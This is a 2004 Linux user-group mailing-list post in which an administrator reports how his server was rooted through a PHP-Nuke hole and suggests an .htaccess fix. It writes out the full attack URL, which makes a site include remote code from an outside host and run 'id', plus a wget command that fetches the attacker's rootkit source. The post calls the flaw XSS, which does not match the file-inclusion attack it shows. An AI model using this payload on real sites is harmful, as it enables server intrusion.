[clug-talk] Root Kit found; source found; hole found.

Roy Souther Sat, 08 May 2004 00:35:24 -0700

I found the hole used to get into my server. I know this for a fact because it lead me to the source code for the root kit.

The hole PHP-Nuke XSS or cross-site scripting.

To get the source code run wget http://cmd.azevedo.info?&cmd=id&file=article&sid=33

The attack http://yoursite/modules.php?name=http://cmd.azevedo.info?&cmd=id&file=article&sid=33

The fix put .htaccess files in all sub directories of the the phpnuke site that have "deny from all" in them.

WOW! What a cool program.

Roy Souther
www.SiliconTao.com

Changing the way people do business.

signature.asc
Description: This is a digitally signed message part

_______________________________________________
clug-talk mailing list
[EMAIL PROTECTED]
http://clug.ca/mailman/listinfo/clug-talk_clug.ca

[clug-talk] Root Kit found; source found; hole found.

Reply via email to